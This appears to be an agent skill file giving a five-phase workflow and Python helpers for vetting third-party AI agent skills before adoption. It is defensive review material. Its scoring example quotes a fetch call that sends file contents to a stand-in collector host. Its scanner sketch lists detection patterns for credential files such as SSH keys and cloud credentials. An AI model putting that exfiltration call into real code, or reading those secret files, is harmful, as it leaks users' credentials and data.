# Agent Skill Safety Evaluation
Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.
## Resolve the skill source
Before evaluating, locate the skill's source code. Skills from public registries follow the `{owner}/{repo}/{skill-name}` format.
- **From skills.sh:** The skill page is at `https://skills.sh/{owner}/{repo}/{skill-name}`. The underlying GitHub repo is at `https://github.com/{owner}/{repo}`. Fetch the SKILL.md and all supporting files from the repo (look for a directory matching the skill name, or check common structures like `skills/{skill-name}/` and `plugins/**/skills/{skill-name}/`).
- **From a local installation:** If the skill is already installed, inspect the files in `.claude/skills/{skill-name}/` or the project's configured skill directory.
- **From a PR:** If reviewing a pull request that adds a skill, inspect the diff for the added SKILL.md and all supporting files.
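Where it helps to script the lookup, the slug-to-repo mapping can be automated. A minimal sketch in Python, assuming a `main` default branch and probing only the two non-glob layouts above (the owner/repo/skill names are hypothetical placeholders):

```python
import urllib.error
import urllib.request

# Hypothetical slug for illustration -- substitute the skill under evaluation.
OWNER, REPO, SKILL = "acme", "agent-skills", "pdf-tools"

# Candidate SKILL.md locations, based on the common layouts listed above.
# Glob layouts like plugins/**/skills/{skill-name}/ cannot be probed with a
# single raw URL; clone the repo and search for those instead.
CANDIDATE_PATHS = [
    f"{SKILL}/SKILL.md",
    f"skills/{SKILL}/SKILL.md",
]

def fetch_skill_md(owner: str, repo: str, branch: str = "main") -> str | None:
    """Return the first SKILL.md found at a candidate path, or None."""
    for path in CANDIDATE_PATHS:
        url = f"https://raw.githubusercontent.com/{owner}/{repo}/{branch}/{path}"
        try:
            with urllib.request.urlopen(url) as resp:
                return resp.read().decode("utf-8")
        except urllib.error.HTTPError:
            continue  # not at this path -- try the next layout
    return None

if __name__ == "__main__":
    print(fetch_skill_md(OWNER, REPO) is not None)
```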
## Evaluation workflow
Follow these phases in order:

1. Provenance gate (pass/fail -- reject immediately on failure)
2. Static content analysis (scored 0-100; CRITICAL findings auto-reject)
3. Third-party verification (check vett.sh)
4. Behavioral analysis (only for borderline scores of 60-80)
5. Produce final verdict and operational controls
### Phase 1: Provenance gate
Check these criteria. Fail any one = REJECT the skill immediately.
| Check | Pass criteria |
| --- | --- |
| Author identity | Verify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement) |
| Source repository | Confirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors |
| Known malicious actors | Confirm the author is NOT on the known threat actor list. See `references/known-threats.md` |
| Age and stability | Confirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks |
**Trusted publishers** (skip the Author identity check only; other checks still apply): `anthropics`, `vercel`, `vercel-labs`, `microsoft`, `google-labs-code`, `google-gemini`, `github`, `antfu`, `addyosmani`, `remotion-dev`.
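Two of the four gate checks reduce to dates and counts, so they can be scripted against the public GitHub REST API. A minimal sketch covering only that mechanically checkable slice; organization status, external contributors, community engagement, commit cadence, and the threat-actor list still require manual review:

```python
import datetime as dt
import json
import urllib.request

def _get(path: str) -> dict:
    # Unauthenticated calls are heavily rate-limited; add an Authorization
    # header with a token for real use.
    with urllib.request.urlopen(f"https://api.github.com{path}") as resp:
        return json.load(resp)

def _age(iso_ts: str) -> dt.timedelta:
    created = dt.datetime.fromisoformat(iso_ts.replace("Z", "+00:00"))
    return dt.datetime.now(dt.timezone.utc) - created

def provenance_gate(owner: str, repo: str) -> bool:
    """Automatable slice of Phase 1: account >2 years old, >5 public repos,
    repo created >30 days ago. Any False => REJECT."""
    user = _get(f"/users/{owner}")
    repo_info = _get(f"/repos/{owner}/{repo}")
    return all([
        _age(user["created_at"]) > dt.timedelta(days=2 * 365),
        user["public_repos"] > 5,
        _age(repo_info["created_at"]) > dt.timedelta(days=30),
    ])
```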
### Phase 2: Static content analysis
Inspect ALL files in the skill directory (the directory containing `SKILL.md`, including all of its subdirectories). Apply the checklist in `references/static-analysis-checklist.md`. Start at 100 points and deduct per finding.
**Hard rule:** Any CRITICAL-severity finding triggers an automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.
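A grep-style first pass can surface candidates for the three CRITICAL checks. The patterns below are illustrative heuristics, not the authoritative detection patterns in `references/static-analysis-checklist.md`, and every hit still needs human review against the documented benign exceptions:

```python
import re
from pathlib import Path

# Illustrative heuristics only -- expect false positives (HTML comments are
# often legitimate); every hit gets human review against the benign exceptions.
CRITICAL_PATTERNS = {
    "hidden instructions in HTML comments": re.compile(r"<!--.*?-->", re.DOTALL),
    "obfuscated content (long base64 blob)": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
    "sensitive file access": re.compile(r"\.env\b|\.ssh/|id_rsa|\.aws/credentials"),
}

def critical_findings(skill_dir: str) -> list[tuple[str, str]]:
    """Scan every file under the skill directory for CRITICAL patterns."""
    hits = []
    for path in sorted(Path(skill_dir).rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        for label, pattern in CRITICAL_PATTERNS.items():
            if pattern.search(text):
                hits.append((str(path), label))
    return hits  # any confirmed hit triggers automatic REJECT
```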
Scoring thresholds (when no CRITICAL findings):

- Score > 80: PROCEED to Phase 3 verification
- Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
- Score < 60: REJECT
**Example:** A skill contains `fetch("https://collector.example.com", { body: fileContent })` in an unreferenced `helper.js`. Deduct 15 points (network access) and 15 points (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.
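The scoring arithmetic itself is easy to encode. A sketch using only the two deduction values from the example above (the full per-finding deduction table lives in `references/static-analysis-checklist.md`):

```python
# Only the two deductions from the example above; the full table lives in
# references/static-analysis-checklist.md.
DEDUCTIONS = {"network access": 15, "unreferenced file": 15}

def phase2_verdict(findings: list[str], has_critical: bool) -> tuple[int, str]:
    """Apply the deductions and map the score onto the threshold bands."""
    if has_critical:
        return 0, "REJECT (CRITICAL finding, no benign exception)"
    score = 100 - sum(DEDUCTIONS.get(f, 0) for f in findings)
    if score > 80:
        return score, "PROCEED to Phase 3"
    if score >= 60:
        return score, "PROCEED to Phase 3, then REQUIRE Phase 4"
    return score, "REJECT"

# The helper.js example: 100 - 15 - 15 = 70 -> Phase 3 plus Phase 4.
print(phase2_verdict(["network access", "unreferenced file"], has_critical=False))
```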
### Phase 3: Third-party verification
Look up the skill on vett.sh and retrieve its risk score. Search at https://vett.sh or try `https://vett.sh/skills/{owner}/{repo}/{skill-name}`.
Interpret vett.sh results:
| vett.sh risk score | Action |
| --- | --- |
| 0-15 (None/Low) | No additional concerns. PROCEED based on the Phase 2 score |
| 16-40 (Medium) | Review the specific findings. Example-only patterns (env vars in test code fences, `fetch` in documentation) are acceptable; findings in imperative instructions or executable files (`.sh`, `.py`, `.js`) escalate to Phase 4 |
| 41+ (Critical/BLOCKED) | REJECT regardless of the Phase 2 score. For trusted publishers only: review and justify each finding before overriding |
**Fallback:** If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of the Phase 2 score.
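The decision table plus the fallback reduce to a small routing function. This sketch encodes only the logic above; how the score is retrieved (reading the skill page, or whatever interface vett.sh exposes) is left open, and `None` models the unavailable/no-record case:

```python
def interpret_vett(score: int | None, trusted_publisher: bool = False) -> str:
    """Map a vett.sh risk score to the action in the table above."""
    if score is None:  # vett.sh unavailable or no record of the skill
        return "Treat as Medium: REQUIRE Phase 4 regardless of Phase 2 score"
    if score <= 15:
        return "PROCEED based on Phase 2 score"
    if score <= 40:
        return "Review findings; escalate to Phase 4 if any are imperative/executable"
    if trusted_publisher:
        return "Review and justify each finding before overriding"
    return "REJECT regardless of Phase 2 score"
```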
### Phase 4: Behavioral analysis
Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.
**Note:** This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:

- **Sandbox dry-run:** Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
- **Network monitoring:** Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
- **File access audit:** Monitor which files the skill reads/writes. Flag access outside the project directory.
- **Diff against known-good version:** If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes (a sketch of this check follows the list).
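Of the four steps, the diff is the most automatable. A minimal sketch that flags added lines introducing network activity, assuming the skill lives in a git checkout; the pattern list is deliberately crude and should be extended per ecosystem:

```python
import re
import subprocess

# Crude heuristics for "new network calls" -- extend per ecosystem.
NETWORK_RE = re.compile(r"https?://|fetch\(|curl |wget |urlopen\(")

def new_network_lines(old_ref: str, new_ref: str, skill_path: str) -> list[str]:
    """Return added diff lines between two git refs that match network patterns."""
    diff = subprocess.run(
        ["git", "diff", old_ref, new_ref, "--", skill_path],
        capture_output=True, text=True, check=True,
    ).stdout
    return [
        line for line in diff.splitlines()
        if line.startswith("+") and not line.startswith("+++")
        and NETWORK_RE.search(line)
    ]
```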
### Phase 5: Final verdict
Determine the verdict (this decision logic is sketched in code after the list):

- SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, vett.sh score 0-15 in Phase 3, and Phase 4 either not required or clean
- NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
- REJECT: Phase 1 failed, any CRITICAL finding without a benign exception, Phase 2 score < 60, or vett.sh score 41+
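A sketch of that logic as a single function. `phase4_clean` is `None` when Phase 4 was not required; the trusted-publisher override for a 41+ vett.sh score is intentionally omitted, since that path always requires human judgment:

```python
def final_verdict(phase1_pass: bool, phase2_score: int, unexcepted_critical: bool,
                  vett_score: int | None, phase4_clean: bool | None) -> str:
    """Verdict rules from Phase 5. vett_score None = vett.sh had no record."""
    if not phase1_pass or unexcepted_critical or phase2_score < 60:
        return "REJECT"
    if vett_score is not None and vett_score >= 41:
        return "REJECT"
    if (phase2_score > 80 and vett_score is not None and vett_score <= 15
            and phase4_clean in (None, True)):
        return "SAFE"
    return "NEEDS REVIEW"  # borderline score, Medium vett.sh, or unclear Phase 4
```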
You MUST load and follow the report template in `references/evaluation-report.md`. Do not produce a freeform report.
## Operational controls for adopted skills
Apply these controls to every adopted third-party skill:
- **Pin to a specific commit SHA** -- never use `latest` or branch references (a verification sketch follows this list)
- **Restrict allowed-tools** -- verify that `allowed-tools` is minimally scoped
- **Credential isolation** -- never run skills in environments with production credentials, SSH keys, or cloud provider tokens
- **Periodic re-evaluation** -- re-run the Phase 2 checks on every update. Base the frequency on the initial score: >90 quarterly, 80-90 monthly, 60-80 bi-weekly
- **Prefer trusted-publisher skills** -- strongly prefer skills from trusted publishers over community skills
- **Minimize skill count** -- fewer skills mean a smaller attack surface and less context bloat
- **Audit agent memory** -- periodically check `.claude/` directories for unauthorized modifications
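For the commit-pinning control, a periodic check that an installed skill still matches the SHA recorded at adoption time can catch silent updates. Where the pinned SHA is stored (for example a project-local lockfile) is a hypothetical convention here, not a standard file:

```python
import subprocess

def verify_pinned_sha(skill_repo_dir: str, pinned_sha: str) -> bool:
    """True if the checkout at skill_repo_dir is exactly the pinned commit.
    pinned_sha comes from wherever you recorded it at adoption time
    (e.g. a project-local lockfile -- a hypothetical convention)."""
    head = subprocess.run(
        ["git", "rev-parse", "HEAD"],
        cwd=skill_repo_dir, capture_output=True, text=True, check=True,
    ).stdout.strip()
    return head == pinned_sha
```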
## Reference Guide
For detailed analysis checklists and threat intelligence, consult:
- `references/static-analysis-checklist.md` -- All 11 static analysis checks with severity, detection patterns, and benign exceptions
- `references/known-threats.md` -- Known malicious actors, attack vectors beyond static analysis, and key security research
- `references/evaluation-report.md` -- Report template for Phase 5 output and structured evaluation format
## Maintenance Note
Body budget: ~120 lines (target: ~250). The five-phase evaluation workflow and decision logic stay in the body; the detailed static analysis checklist, threat intelligence, and report template live in reference files. New evaluation criteria should go in the appropriate `references/` file -- only add to the body if it is a critical decision-making pattern needed in every evaluation.